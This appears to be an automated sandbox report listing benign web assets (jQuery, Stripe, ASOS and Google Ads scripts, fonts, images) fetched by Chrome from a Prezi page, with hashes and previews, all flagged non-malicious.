                                                                                                                                                                                              Preview:!function(){"use strict";const e=e=>{e.panel.style.height="auto",e.panel.height=e.panel.offsetHeight+"px",e.visible||(e.panel.style.height=0)},t=t=>{const r={visible:!1,animating:!1,panel:t.nextElementSibling,button:t.querySelector("button")};r.panel.setAttribute("style","display: block");(t=>{let r=window.innerWidth;e(t),window.addEventListener("resize",(()=>{r!=window.innerWidth&&(r=window.innerWidth,e(t))}))})(r),t.addEventListener("click",(e=>{e.preventDefault(),r.visible?(e=>{e.visible=!1,e.button.setAttribute("aria-expanded","false"),e.panel.setAttribute("aria-hidden","true"),e.button.classList.remove("open"),e.panel.style.height=0})(r):(e=>{e.visible=!0,e.button.classList.add("open"),e.button.setAttribute("aria-expanded","true"),e.panel.setAttribute("aria-hidden","false"),e.panel.style.height=e.panel.height})(r)}))},r=e=>{const t=window.innerWidth,[r,n,o]=(e=>{if(e>=736)return[40,".desktop-bottom",".hero-slug"];return[32,".mobile-bottom",".hero-slug-mobile"]})(t),a=e.querySelect
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (526), with no line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):526
                                                                                                                                                                                              Entropy (8bit):4.844995662196588
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:D96C709017743C0759CF3853D1806BA5
                                                                                                                                                                                              SHA1:72E21587610C49C8305A55E71F73FA88ED618205
                                                                                                                                                                                              SHA-256:BA2338AA6670580269C762F51C4291DAEF913201AA8F4D4FD166C1A878262652
                                                                                                                                                                                              SHA-512:974E260ED8BD1D99628FC3248F07179F6EA228E37A6B9D3EF906DBA57571F2DF54D73F93D1F3460902D28A90BD4793BCA35477B2EF8FBF424B9112147F04BCCF
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview:!function(){"use strict";var e="https://m.stripe.network",n=window.location.hash,t=/preview=true/.test(n)?"inner-preview.html":"inner.html",o=document.createElement("iframe");o.src="".concat(e,"/").concat(t).concat(n);var i=function(n){if(n.origin===e){var t=window.opener||window.parent||window;if(!t)return;t.postMessage(n.data,"*")}else o.contentWindow.postMessage(n.data,"*")};window.addEventListener?window.addEventListener("message",i,!1):window.attachEvent("onMessage",i),document.body&&document.body.appendChild(o)}();
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (26334)
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):26384
                                                                                                                                                                                              Entropy (8bit):5.362940079689228
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:3667B64516B460AE907CE815618207AB
                                                                                                                                                                                              SHA1:88A4E8491DBCF88BF76486534CAD0BD99192C614
                                                                                                                                                                                              SHA-256:2BDC31421C9AD184399B387B910AF5B7110732E2B3B532FD1EEA1E3ED4CFCF38
                                                                                                                                                                                              SHA-512:456AB64A42760E802405A4BE84215A4C832DFB07ED7EF973B88804479FEBA7815FD23A0BA2398DFC49BCA957A4618FD6BFE462F1A2E2B3CFEED884CB24B85B33
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              URL:https://assets.asosservices.com/asos-ui/web-request/browser.es5.defc2d72.js
                                                                                                                                                                                              Preview:this.window=this.window||{},this.window.asos=this.window.asos||{},this.window.asos.webRequest=function(e){"use strict";var t=function(e,t,r){return t in e?Object.defineProperty(e,t,{value:r,enumerable:!0,configurable:!0,writable:!0}):e[t]=r,e};var r=function(e,t){(null==t||t>e.length)&&(t=e.length);for(var r=0,n=new Array(t);r<t;r++)n[r]=e[r];return n};var n=function(e){if(Array.isArray(e))return r(e)};var o=function(e){if("undefined"!=typeof Symbol&&Symbol.iterator in Object(e))return Array.from(e)};var i=function(e,t){if(e){if("string"==typeof e)return r(e,t);var n=Object.prototype.toString.call(e).slice(8,-1);return"Object"===n&&e.constructor&&(n=e.constructor.name),"Map"===n||"Set"===n?Array.from(e):"Arguments"===n||/^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(n)?r(e,t):void 0}};var a=function(){throw new TypeError("Invalid attempt to spread non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.")};var s=function(e){return n(e)
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (39065)
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):39144
                                                                                                                                                                                              Entropy (8bit):5.29609149633264
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:4EB0F26BEEA5BC3779D90A27AC8EDB62
                                                                                                                                                                                              SHA1:7EC8DEBBCDB7882226AF572A55AB5956184E20F7
                                                                                                                                                                                              SHA-256:4EA88C3B946290B7117C0941C91AE01DBD7F294AB8C4C359775371379436AA81
                                                                                                                                                                                              SHA-512:07E98FB0EEFA551A9B27AE551442DCD48EA592F5DCEB2B508A603ACAB613E15B10C4DEF46215F13E66D783C460A28265C82051F59B776849DD21E0AD9465340B
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              URL:https://assets.asosservices.com/sitechromepublisher/client.sitechrome.deferred.13c30ac023f768c61047.css
                                                                                                                                                                                              Preview:.osdMOxg{--icon:url("data:image/svg+xml;charset=utf-8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 20 20'%3E%3Cpath fill='%23fff' d='M9.97 8.274 2.335.637.637 2.334 8.274 9.97.637 17.607l1.697 1.697 7.637-7.636 7.636 7.636 1.697-1.697-7.636-7.636 7.636-7.637L17.607.637 9.971 8.274z'/%3E%3C/svg%3E");cursor:pointer;margin:0 5px;-webkit-mask-size:19px;mask-size:19px;padding:0 16px}.osdMOxg:hover{background-color:var(--1cf22is)}.FfmKyt0{display:block;height:50px;left:0;-webkit-mask-position:15px center;mask-position:15px center;-webkit-mask-size:20px 20px;mask-size:20px 20px;position:absolute;width:50px}.Mlh3INa{background-color:initial;background-image:var(--icon);background-position:15px;background-repeat:no-repeat;background-size:20px 20px}.pggyrBd{--icon:url("data:image/svg+xml;charset=utf-8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 20 20'%3E%3Cpath fill='%23fff' d='M14 6a4 4 0 1 0-8 0 4 4 0 0 0 8 0zm2 0A6 6 0 1 1 4 6a6 6 0 0 1 12 0zm-6 9c-3.068 0-5.67 1.223-7.03
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:HTML document, ASCII text
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):65
                                                                                                                                                                                              Entropy (8bit):4.0299097360388085
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:2489B6BEDA4E86203D22D9C4D2E67094
                                                                                                                                                                                              SHA1:590C361A0E91BB56D08DDEC98BF49A02E017D191
                                                                                                                                                                                              SHA-256:E7112B70EED95D42B178135728E6153E34F07001827870748DE87CD7DEC3538E
                                                                                                                                                                                              SHA-512:2DB08EB201F83DD7C2B7293A1E8375C0FE06B1787E21EC0D2F6EF3BC9D5355CCC06208B79FF2457C0175B30A1643AE3B624684E4E834AFDEEA727D7E61A0FB3C
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview:<HTML><HEAD> <TITLE>200 OK</TITLE></HEAD><BODY>.OK.</BODY></HTML>
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (930), with no line terminators
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):930
                                                                                                                                                                                              Entropy (8bit):5.12292712843304
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:06BFCD88AF438673A8BF9B845A11AA6E
                                                                                                                                                                                              SHA1:D024A745032CBE115526ABE648D9FA0F0A10A681
                                                                                                                                                                                              SHA-256:947AC0903521F5ECEEFC90637C066306A8CA67466CCC188BB0107FB7CFB532D1
                                                                                                                                                                                              SHA-512:6A37EA27F3AD16DE6BCB4C386D9F09962902AE2F2FDF76B6723CFF8155CD0B9D4504D1EA6ED3C4D5C9D49BE9C636EB9386BB13C9A787A71F02640A8EC939D180
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              URL:https://m.stripe.network/inner.html
                                                                                                                                                                                              Preview:<!doctype html><html><head><meta charset="utf-8"><title>StripeM-Inner</title></head><body><script>!function(){var e=document.createElement("script");e.defer=!0,e.src="out-4.5.43.js",e.onload=function(){var e;window.StripeM&&(e=window.location.hash,/ping=false/.test(e)||(e=(e=e.match(/version=(4|6)/))?e[1]:"4",window.StripeM.p({t:!0,v:e})),e=function(e){if(window.opener||window.parent||window)try{var i=((t=JSON.parse(e.data)).message||t).action,t=t.message?t.message.payload:t;switch(i){case"ping":window.StripeM.p({t:!0,o:{muid:t.muid,sid:t.sid,referrer:t.referrer,url:t.url,title:t.title,v2:t.v2},v:t.version||"4"});break;case"track":if(!t.source||!t.data)return;window.StripeM.b({muid:t.muid,sid:t.sid,url:t.url,source:t.source,data:t.data},t.version||"4")}}catch(e){}},window.addEventListener?window.addEventListener("message",e,!1):window.attachEvent("onMessage",e))},document.body.appendChild(e)}()</script></body></html>
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 41744, version 1.0
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):41744
                                                                                                                                                                                              Entropy (8bit):7.995124707961436
                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:CE1D24FC54E9A772EC42299C27330AB8
                                                                                                                                                                                              SHA1:E3E7E1124EDAF8C376E5840535DFBF51D0395084
                                                                                                                                                                                              SHA-256:9716EA7BB32137A8E3ECF904D2B7B4E86E930EA2352B46CBF3AA8400D4AFA892
                                                                                                                                                                                              SHA-512:F5B12C8260E3E07ED59BAFDC697B85BCD59DDE683B7FFD30DC00E8B4C5134864F447EA25271B02DE93EE6AB2783124AA13238A252328735F8078BB2A43135F0B
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              URL:https://assets1.prezicdn.net/common/fonts/raleway-regular.woff2
                                                                                                                                                                                              Preview:wOF2..............*.............................?FFTM..T........`..V..............6.$..$. ......[...5......V.9..A..=..z..zs..@......M.!p...!..........."c............*.\.Ra&..^......p.Z&.DP.....F8..R..atd1!r.v..V..6.v.w..n.E.a..t?S...8...>.0...cK.Q....y.~....fS.N.hT..R..Y..+r.1...:"'WN..t...........;."ZV...b.M..].td..Q.....x. JY.U...;{..l .......L01....{.<a.........rl?s[E.o.....7.7"._....j.#G......w{~..yP.....x...'.a..$...F...(>...(X.j..j.{W.m=.....'.2n=..J.+O./O|k.y.zf..0Kb....Y..qa..@.....".B...............P.:E".DH. ".q.4....I.liC....8N.+.1..e...&.y....Z.m....",...B`i.Ss....\..+2.e;V...N.e...@...}.l9....?.A......Z.$.$.$........._....R.....Q_t....~.....0.Y.....5.E.{_E.bx...%..J.s.uG.........l333......W$..9.T..J./.......w.=f..._.u....z.>.j.V}..c..CUU..QUQ...!"""""..8.#...........w _.j&.&. ..2.O...}.P.X..... ....~-.9{9..m...,v..,3.W.%V.`(... ....9{_...!*.........3f~.........b.5..I..*....j....."..C.oQ......Z3.J..p...)..Z..K.G..i.......*S..`.G(...?.
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (4450)
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):4522
                                                                                                                                                                                              Entropy (8bit):5.306364650524668
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:3C8F93FEC24C564BD9DDFDA68827666A
                                                                                                                                                                                              SHA1:968CA6A78637C83D539D5603BF8FDAFD72C1E4A6
                                                                                                                                                                                              SHA-256:EE6F5A3E3C885FEDD52B015CAB0F1847A86805DCE43723C9F6550D98BC2FCA03
                                                                                                                                                                                              SHA-512:4B07C8D575FCF286C734E85CF336821D1EECD2093838BB9394CF76B3CD7CD6811E75D79581ECBA80961A8AD605525123DC94CA859256CEF846F4EF1491F3B927
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview:// 1.0.572.require(["jquery"],function($){function onCarouselAction(){var overrides;void 0===window.analyticsCarouselAction&&(s=s_gi(s.account),(overrides={}).linkTrackVars=commons.setLinkTrackVars(["prop40"]),overrides.linkTrackEvents=commons.setLinkTrackEvents(["event120"]),s.prop40=(arguments[1].carouselType+"|"+arguments[1].componentName).toLowerCase(),s.events="event120",s.tl(!0,"o","homepage|"+arguments[1].context,overrides),window.analyticsCarouselAction=1)}var commons=new CommonAnalytics({"tracking.homePage.carouselAction":function(){},"tracking.homePage.pageLoad":function(){}});window.asos.eventBus.emit("analytics-ready");window.asos.eventBus.addListener("tracking.homePage.carouselAction",onCarouselAction),$(window).on("tracking.homePage.carouselAction",onCarouselAction),__trackingData={},window.asos&&window.asos.contentTargeting&&document.body.querySelectorAll("[data-targeted-content-item]").length?window.asos.contentTargeting.subscribe(function(data){__trackingData.targeting
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:PNG image data, 80 x 80, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):5000
                                                                                                                                                                                              Entropy (8bit):7.953749053207191
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:3E5F5806E1B496D0A85BF8D15CB3AB00
                                                                                                                                                                                              SHA1:70D14CD37829384584C4A1114D8A2C244795E709
                                                                                                                                                                                              SHA-256:7C9F22AE56B4C78410EEA799E85D1E2CFD46330C55F8C629D5E412852982A295
                                                                                                                                                                                              SHA-512:A7646B40CAB91EA57206FFDA97AE61656D13DD549776F1E8ACE8F346E511A6969E4A9AC974B8D7570E3B3D81A959DE8F3AB78C36F4B2430E397D762B67CFFFA3
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview:.PNG........IHDR...P...P............sRGB........BIDATx...|T......{&.L..cB....)P...V.).......g........G}t.U..j..h-U....~D-..Q^..(.T !1/&..$.~.{......L.'.;w.>..{......#.4...o.#4%.."...$.,...$dZ.lN.../B.k...b..b5/&..6..K....fL5..{v..0..bHN..A..N...?7A\.......-.K.A%~ ..!..`../..~H.eY....F./.1$.....".v.8.K.A..G...uLY...:...9.Vt./...9.z5.o...._..i<.7X.../.n.F.n..r...R.B.Y...A.F.,C$.F..(-..C....9(.i....O.zp.O....p/.t....>.-.......}.B..>H 7.X(..fK.4..!......RT..@...b.9.lmd...o..=_... .IP..Jr..../..U+NU.N....?...g._..cp...B....$kt..I.ay........o...D..Z.[B...v....A_z...;.-......&.....kQ.v..O..Ik.....!.x7..=......(...Q.E.}$K.t.^..]..7v2.>)mWcB^#.+.......F.x(Kw....4.G.0.2..:Q.N..*L*mD.=*......*..p.J.\.$..o.,......rB..aR...5T....|.RD9..f...|....zx...9WaO.@.9`.ly..nfx\.fx.*..H=..0...`.6PK.P.K...{*..a......ub.`..E...1....h...}..m.[..H..cX'.U.#..:...K.q.rQ..-...m.aKT.:...;..c:1.$7#...TJ.f.F....;Gg'.!7....*l.. W.Dt..0..<..y..u.c....n....4.h..fa..2<.a.
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):77
                                                                                                                                                                                              Entropy (8bit):4.261301029168016
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:806699ED4BB65178112F5BAD2242C52D
                                                                                                                                                                                              SHA1:F44771599DB97A9EA255845DC886AE69EC293024
                                                                                                                                                                                              SHA-256:6595E4AA67EA4D50268F53193CBE84B2201B3130DC15F690165007BDB829E068
                                                                                                                                                                                              SHA-512:01FD5927CB4F6A6C1EA7B91F9ADD3F39AB3CC936FC06D806BF0A7A656E008F4281A96B7F8A850D8D470E8DF832B95A539836D734DC19D33B9946C31C948839FA
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview:jsonFeed({"country":"US","state":"TX","stateName":"Texas","continent":"NA"});
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):61
                                                                                                                                                                                              Entropy (8bit):3.990210155325004
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                                                                                                                              SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                                                                                                                              SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                                                                                                                              SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1
                                                                                                                                                                                              Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 91700, version 1.590
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):91700
                                                                                                                                                                                              Entropy (8bit):7.997578233786376
                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:2DADBB3C03C1CDF1491621ADCAA9EA84
                                                                                                                                                                                              SHA1:8773EFEC2A3A7235FE0FB6E700D113D9401CB6AF
                                                                                                                                                                                              SHA-256:BB391EE077B5B90859C5EBC8CD3AC6B5D6D90ADF15AF75E3CF04EE1690B90821
                                                                                                                                                                                              SHA-512:455C314CAFAE03601A93803961DC454CF2B12A8FC775735EC9417415058F0C646D103E339966A0E1E45BD05AE1857B29AD8946B8BAB90FA23FC2460AB09A003A
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              URL:https://assets.asosservices.com/fonts/futura-pt/book.1bb391ee.woff2
                                                                                                                                                                                              Preview:wOF2......f4.......h..e....N.......................b..t..{.`...."..a.....\........6.$..\..`.. ..+..u...[.Y...2.[.A..f.&j...>._...G.9....i..N_...6...m;ZV..k...JK>........6..y#..A.....,M...SU2.u.....Q.:$+....UMj0...JL...4.l^.L...z.......\.i...f.;.UX.........0....!........&..j...../..p..B..f.T.......C{.Z.URF/G{Ew...m..n.[.......z1j/..\.ZX.^.zf...-..>....#79.QY.-7dyg6..#.{im.+.#_..d.vW.............=...kaB....y...../.UZ...)=}.......I`9V..$Jdx.72.]O.HJ......,Jr...U.R...`.0..~d....8..i0.]...}..........Lg3lKw.......Z.....W(.....rfo.L...>.!.s...!..M.+..E`...jq\..mI.r2.7;PO..r.&..Q........ck.....O..............7..q....V#.E.....0c.>..#..J.JR.0.L5.....[r..SJ..oN.......m_....q.> .0..j.dB;..)].....>.D@M...YZ..~!.......6..GY."*"* uX.....k....kc...E.*..\..v.J....0...l.xc}B</.l.V[..?..sI..5).....Tbc..F...0p..m...a. 6.LPPQ.*$.. f`$.X...X........].._b.....;].+."......n.?....=...4..A...0w.I*...62L[.a..F....!....*D.T.....~* .T:.iOnd..)7....j[.C./.+.2..\..b..d
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (65447)
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):89501
                                                                                                                                                                                              Entropy (8bit):5.289893677458563
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                                                                                                              SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                                                                                                              SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                                                                                                              SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:PNG image data, 56 x 83, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):61
                                                                                                                                                                                              Entropy (8bit):3.9697984750326007
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:B89BB699C3D1E0BD43AF45708BE883E3
                                                                                                                                                                                              SHA1:5942993D849A10A95BDD5A1C6D0189BF96B5BFD4
                                                                                                                                                                                              SHA-256:3CDCDC3997E41843BD5F52E833A102BBCFF1CDAC9A53F5436823CBCBA2157931
                                                                                                                                                                                              SHA-512:B87B731A67D80626CBD39979066BE0F2DF3CC74928781430CD4BC3339AA28CB57F47ECF3BC73E661D7AFA29D2083A309636D8F8F627694895E2E1F58423FAC9F
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8de66d096e676b2d/1730910186459/LtdfFUwQ4kcPBJJ
                                                                                                                                                                                              Preview:.PNG........IHDR...8...S.....E.S.....IDAT.....$.....IEND.B`.
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (4853), with no line terminators
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):4853
                                                                                                                                                                                              Entropy (8bit):5.83353512230611
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:A998A70A4F4819200952C60ED6817BB1
                                                                                                                                                                                              SHA1:CCC7CB437A44B79DE13DD4F8B3D0321590948F19
                                                                                                                                                                                              SHA-256:6FC656C505A4B8FF616CA045FB87D2BED8528B499463A542EE3DF042B89A67E7
                                                                                                                                                                                              SHA-512:35D903FFFC745D82C3994A6059F069E91FD7A0E18E00E5386517B526CC2418D2C5E6CF87F719734892137FF839D0CDB6AF9A28A750E4B76720A2BEA692F018D6
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              URL:https://googleads.g.doubleclick.net/pagead/viewthroughconversion/1001687149/?random=1730910098524&cv=11&fst=1730910098524&bg=ffffff&guid=ON&async=1&gtm=45be4au0v892644071z86358348za200zb6358348&gcd=13r3r3l3l5l1&dma=0&tag_exp=101823848~101878899~101878944~101925629&u_w=1280&u_h=1024&url=https%3A%2F%2Fprezi.com%2Fi%2Famopqalyrbyv%2Fjennifer-zisk-vitron-msw-lsw%2F&hn=www.googleadservices.com&frm=0&tiba=Jennifer%20Zisk-Vitron%2C%20MSW%2C%20LSW%20by%20Secure%20Bill%20on%20Prezi%20Design&npa=0&pscdl=noapi&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.149&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fdr=AQ&auid=887411132.1730910099&fledge=1&data=event%3Dgtag.config&rfmt=3&fmt=4
                                                                                                                                                                                              Preview:(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,d){if(a==Array.prototype||a==Object.prototype)return a;a[b]=d.value;return a};function k(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var d=a[b];if(d&&d.Math==Math)return d}throw Error("Cannot find global object");} var m=k(this),p=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},v={};function w(a,b,d){if(!d||a!=null){d=v[b];if(d==null)return a[b];d=a[d];return d!==void 0?d:a[b]}} function x(a,b,d){if(b)a:{var c=a.split(".");a=c.length===1;var e=c[0],g;!a&&e in t?g=t:g=m;for(e=0;e<c.length-1;e++){var f=c[e];if(!(f in g))break a;g=g[f]}c=c[c.length-1];d=p&&d==="es6"?g[c]:null;b=b(d);b!=null&&(a?h(t,c,{configurable:!0,writable:!0,value:b}):b!==d&&(v[c]===void 0&&(a=Math.random()*1E9>>>0,v[c]=p?m.Symbol(c):"$jscp$"+a+"$"+c),h(g,v[c],{co
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:PNG image data, 5 x 68, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):61
                                                                                                                                                                                              Entropy (8bit):4.014960565232002
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:0E87AD0553866D07803CD81CCC384EB5
                                                                                                                                                                                              SHA1:817B3836A836E4D60ADD0729C176A715BEE27FDC
                                                                                                                                                                                              SHA-256:F2C931E336F7C42869431D707456C7ED8C7B0B0F1BD731B503917480959E626A
                                                                                                                                                                                              SHA-512:C24C722BDD74C78F5227905FF86CF08C25841E0891C7A3D5AD63405223669343C670A803FA2A11414E4EA748FF32084A2EA9B9F0180588C95019883B4C74B16A
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8de66b53fb674763/1730910116077/0eeo4pTROHhA4Os
                                                                                                                                                                                              Preview:.PNG........IHDR.......D.......h{....IDAT.....$.....IEND.B`.
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (593), with no line terminators
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):593
                                                                                                                                                                                              Entropy (8bit):5.036054492453408
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:491AF6623B505A7A75BEB5649C801F88
                                                                                                                                                                                              SHA1:31D0A316D9944613D43D7599822B639D76DB075A
                                                                                                                                                                                              SHA-256:280F7ABBA3767CF6939679D81247775C72C76950FFB2CB3D13AED57B97F9099D
                                                                                                                                                                                              SHA-512:7F5F8006ADE1F53F0DB17C36EDA5BF52F756E65587DF75847E8F7BA4EED67C07CDC81484E2BA48FA4421CF3D3CCF12A4CA6076C0D30BF44D12D782C2C52922C0
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              URL:https://assets.prezicdn.net/assets-versioned/prezipage-versioned/5255-770009b/CACHE/css/output.280f7abba376.css
